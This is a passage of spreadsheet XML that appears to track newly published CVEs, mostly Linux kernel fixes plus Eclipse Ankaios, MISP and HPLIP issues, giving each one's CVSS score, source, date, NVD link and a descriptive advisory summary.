          <t>In Eclipse Ankaios versions 0.1.0 through 1.0.2, the agent creates workload files and Control Interface named pipes (FIFOs) under a predictable path derived from the agent name and a hash of the workload's runtime configuration. If a directory or FIFO already exists at that path when the agent (re)starts, the agent reuses it based only on an existence and/or file-type check, without validating its owner or permissions. A local, unprivileged user with write access to the same base directory (by default under `$TMPDIR/ankaios`, e.g. shared `/tmp`) can pre-create this path hierarchy, including the two Control Interface FIFOs, before the agent starts. The agent then treats the attacker-owned FIFOs as the legitimate Control Interface for the targeted workload. The attacker can complete the Control Interface handshake and issue requests using that workload's configured `controlInterfaceAccess` permissions, allowing impersonation of the workload and, depending on its configured permissions, unauthorized reading and/or modification of the cluster's desired state.</t>
        </is>
      </c>
      <c r="S344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86836</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89781</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr"/>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix out-of-bounds read in read_log_rec_buf()
read_log_rec_buf() copies a log record into a caller buffer starting at
	u32 off = lsn_to_page_off(log, lsn) + log-&gt;record_header_len;
log-&gt;record_header_len (and log-&gt;data_off, used for the following pages)
comes verbatim from the on-disk restart area and is only checked for
8-byte alignment in is_rst_area_valid(), so off can exceed
log-&gt;page_size. "tail = log-&gt;page_size - off" then underflows and
memcpy() reads past the page_size-sized buffer returned by
read_log_page(), spilling adjacent slab memory into the replay buffer.
This is reachable by mounting a crafted NTFS image:
 BUG: KASAN: slab-out-of-bounds in read_log_rec_buf+0x216/0x580
 Read of size 64 at addr ffff88800a877ff8 by task exploit/127
  read_log_rec_buf fs/ntfs3/fslog.c:2299
  log_replay fs/ntfs3/fslog.c:4216
  ntfs_loadlog_and_replay fs/ntfs3/fsntfs.c:324
  ntfs_fill_super fs/ntfs3/super.c:1392
  get_tree_bdev_flags fs/super.c:1694
  __x64_sys_mount fs/namespace.c:4360
 The buggy address is located 4088 bytes to the right of
 the 4096-byte region [ffff88800a876000, ffff88800a877000)
Reject an in-page offset outside the current page before the copy.
[almaz.alexandrovich@paragon-software.com: replaced the &gt;= sign with &gt;]</t>
        </is>
      </c>
      <c r="S345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89781</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89782</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr"/>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: reject restart table growth beyond U16_MAX entries
During $LogFile replay, log_replay() indexes the transaction table by the
transact_id taken from the log record header.  check_log_rec() only
verifies that transact_id is non-zero and properly aligned, not its
magnitude, so a crafted image can request an arbitrarily large index.
alloc_rsttbl_from_idx() grows the table to cover that index via
extend_rsttbl(), which passes the new entry count to init_rsttbl():
	rt = init_rsttbl(esize, used + add);
used + add is computed as u32 but init_rsttbl() takes a u16, and the
count is stored in struct RESTART_TABLE as a __le16.  When used + add
exceeds U16_MAX it is truncated, init_rsttbl() allocates a table far
smaller than the index requires, and alloc_rsttbl_from_idx() then
dereferences and writes at the original, untruncated offset -- an
out-of-bounds access past the allocation, reachable by mounting a
crafted NTFS image.
 BUG: KASAN: use-after-free in alloc_rsttbl_from_idx (fs/ntfs3/fslog.c:950)
 Read of size 4 at addr ffff8880327ffff8 by task exploit
  alloc_rsttbl_from_idx (fs/ntfs3/fslog.c:950)
  log_replay (fs/ntfs3/fslog.c:4562)
  ntfs_loadlog_and_replay (fs/ntfs3/fsntfs.c:324)
  ntfs_fill_super (fs/ntfs3/super.c:1393)
  get_tree_bdev_flags
  vfs_get_tree
  path_mount
  __x64_sys_mount
A restart table is limited to U16_MAX entries by its __le16 count, so a
larger growth request is invalid input.  Reject it in extend_rsttbl();
all callers already handle a NULL return.</t>
        </is>
      </c>
      <c r="S346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89782</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89795</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr"/>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: Allow per function PCI slots to fix slot reset on s390
On s390 systems, which use a machine level hypervisor, PCI devices are
always accessed through a form of PCI pass-through which fundamentally
operates on a per PCI function granularity. This is also reflected in the
s390 PCI hotplug driver which creates hotplug slots for individual PCI
functions. Its reset_slot() function, which is a wrapper for
zpci_hot_reset_device(), thus also resets individual functions.
Currently, the pci_create_slot() assigns the same pci_slot object to
multifunction devices. This approach worked fine on s390 systems that only
exposed virtual functions as individual PCI domains to the operating
system.  Since commit 44510d6fa0c0 ("s390/pci: Handling multifunctions")
s390 supports exposing the topology of multifunction PCI devices by
grouping them in a shared PCI domain. This creates a problem when resetting
a function through the hotplug driver's slot_reset() interface.
When attempting to reset a function through the hotplug driver, the shared
slot assignment causes the wrong function to be reset instead of the
intended one. It also leaks memory as we do create a pci_slot object for
the function, but don't correctly free it in pci_slot_release().
Add a flag for struct pci_slot to allow per function PCI slots for
functions managed through a hypervisor, which exposes individual PCI
functions while retaining the topology. Since we can use all 8 bits for
slot 'number' (for ARI devices), change slot 'number' u16 to account for
special values PCI_SLOT_PLACEHOLDER and PCI_SLOT_ALL_DEVICES.</t>
        </is>
      </c>
      <c r="S347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89795</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89806</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr"/>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/sysfb: ofdrm: Fix integer overflow in fb_size calculation
The framebuffer size calculation `fb_size = linebytes * height` can
overflow when both values are large (e.g., 46341 * 46341 &gt; INT_MAX).
Since linebytes and height are both int types, the multiplication is
performed as int * int, which results in undefined behavior on overflow.
Use check_mul_overflow() to detect and prevent this overflow, consistent
with the approach used in simpledrm.c and corebootdrm.c.</t>
        </is>
      </c>
      <c r="S348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89806</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89856</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr"/>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Clamp MSI-X derived queue counts to avoid truncation
ha-&gt;msix_count is u16, but ha-&gt;max_req_queues, ha-&gt;max_rsp_queues and
ha-&gt;max_qpairs are u8. Deriving the queue count as
"ha-&gt;max_req_queues = ha-&gt;msix_count - 1" therefore truncates: a board
(or a misconfigured/malicious hot-plugged device) advertising 257 MSI-X
vectors yields msix_count - 1 == 256, which truncates to 0. An MSI-X
count of 1 zeroes it as well, and in target mode the subsequent
"ha-&gt;max_req_queues--" then underflows 0 to 255.
When the count is 0, qla2x00_alloc_queues() calls
kzalloc_objs(struct req_que *, 0), which returns ZERO_SIZE_PTR. That is
not NULL, so the allocation check passes and the following
"ha-&gt;req_q_map[0] = req" dereferences ZERO_SIZE_PTR, corrupting memory
or crashing the kernel.
Add qla_calc_queue_count() to clamp the derived value into
[1, QLA_MAX_QUEUES - 1] so it always fits in u8 and is never zero, and
use it at all three derivation sites (qla25xx_iospace_config(),
qla83xx_iospace_config() and qla24xx_enable_msix()). Also guard the
target-mode decrement so it cannot reintroduce a zero (which would in
turn underflow max_qpairs).</t>
        </is>
      </c>
      <c r="S349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89856</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89877</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr"/>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: saa7164: fix cleanup on resource allocation failure
saa7164_dev_setup() adds the device to the global saa7164_devlist before
requesting the PCI BAR memory regions.
If get_resources() fails, saa7164_dev_setup() decrements the device count
and returns an error, but leaves the device on saa7164_devlist. The probe
error path then frees the device, leaving a dangling entry on the global
list.
Reuse the existing MMIO mapping error path to remove the device from
saa7164_devlist and decrement the device count before returning.
Also release BAR0 if it was successfully requested but the BAR2 request
fails.</t>
        </is>
      </c>
      <c r="S350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89877</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89885</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr"/>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: platform: mtk-mdp3: Fix SCP device refcounting
mdp_probe() first tries to get the SCP handle with scp_get(). When that
fails, it falls back to looking up the SCP platform device with
__get_pdev_by_id() and then reads its driver data.
The fallback lookup returns the platform device with a reference, just
like scp_get() does. However, the fallback path currently drops that
reference immediately after platform_get_drvdata(). The driver later
still calls scp_put(mdp-&gt;scp) unconditionally from the probe error path
and from mdp_video_device_release(), which drops the SCP device
reference again.
Keep the fallback reference until the existing scp_put() call, so that
the fallback path follows the same ownership rules as the scp_get()
path.</t>
        </is>
      </c>
      <c r="S351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89885</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89904</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr"/>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: Fix acpi_package_ids[] array overflow
With LoongArch virt machine, a typical setting is one core per socket,
there will max 256 sockets (packages) on one VM. With PPTT acpi table,
array acpi_package_ids[] will be overflowed.
Here change the array size of acpi_package_ids[] with the max value of
MAX_PACKAGES and KVM_MAX_VCPUS.</t>
        </is>
      </c>
      <c r="S352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89904</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89943</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr"/>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: loongson: Fix error handling in ACPI property parsing
In loongson_card_parse_acpi(), the return value of
device_property_read_string() for the `codec-dai-name` property was
ignored. If the property is missing or invalid, an uninitialized pointer
would be used later, potentially leading to undefined behavior.
Fix this by checking the return value and propagating the error
appropriately.</t>
        </is>
      </c>
      <c r="S353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89943</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89980</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr"/>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: harmony: initialize locks before requesting IRQ
snd_harmony_create() registers the IRQ before initializing h-&gt;lock and
h-&gt;mixer_lock. A pending interrupt can invoke the handler while these
locks are uninitialized.
Initialize both locks before requesting the IRQ so the handler always
sees valid lock state.</t>
        </is>
      </c>
      <c r="S354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89980</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89992</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr"/>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpuidle: dt_idle_genpd: kfree() the original name allocation
dt_idle_pd_alloc() kasprintf()s the full node path, then points
pd-&gt;name at kbasename() of that string. dt_idle_pd_free() kfree()s
pd-&gt;name, which is no longer the start of the allocation.
Copy the basename instead.</t>
        </is>
      </c>
      <c r="S355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89992</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90895</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr"/>
      <c r="Q356" s="5" t="inlineStr">
        <is>
          <t>CWE-150, CWE-200, CWE-522, CWE-862</t>
        </is>
      </c>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP’s interactive CLI shell implement access control independently from the normal web application, causing several authorization inconsistencies.
The patch shows that CLI access could differ from the web application in multiple security-sensitive areas:
 - feed listings did not enforce the same lookup_visible restrictions for non-host-organisation users;
 - feed detail access did not enforce the same host-organisation/site-admin authorization as FeedsController::view();
 - Feed.headers, which can contain HTTP authorization credentials, could be exposed instead of being hidden or masked;
 - server synchronization authkey values were not explicitly hidden from CLI detail output;
 - sharing-group detail access did not consistently use SharingGroup::checkIfAuthorised();
 - the use command could establish context for a record without first proving that the user was authorized to view that record
The commit additionally hardens pagination and terminal rendering, including neutralization of terminal control sequences found in database-backed values. Those are important hardening changes, but the main vulnerability is the CLI authorization/data-disclosure mismatch.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90895</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91102</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr"/>
      <c r="Q357" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91102</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20323</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr"/>
      <c r="Q358" s="5" t="inlineStr">
        <is>
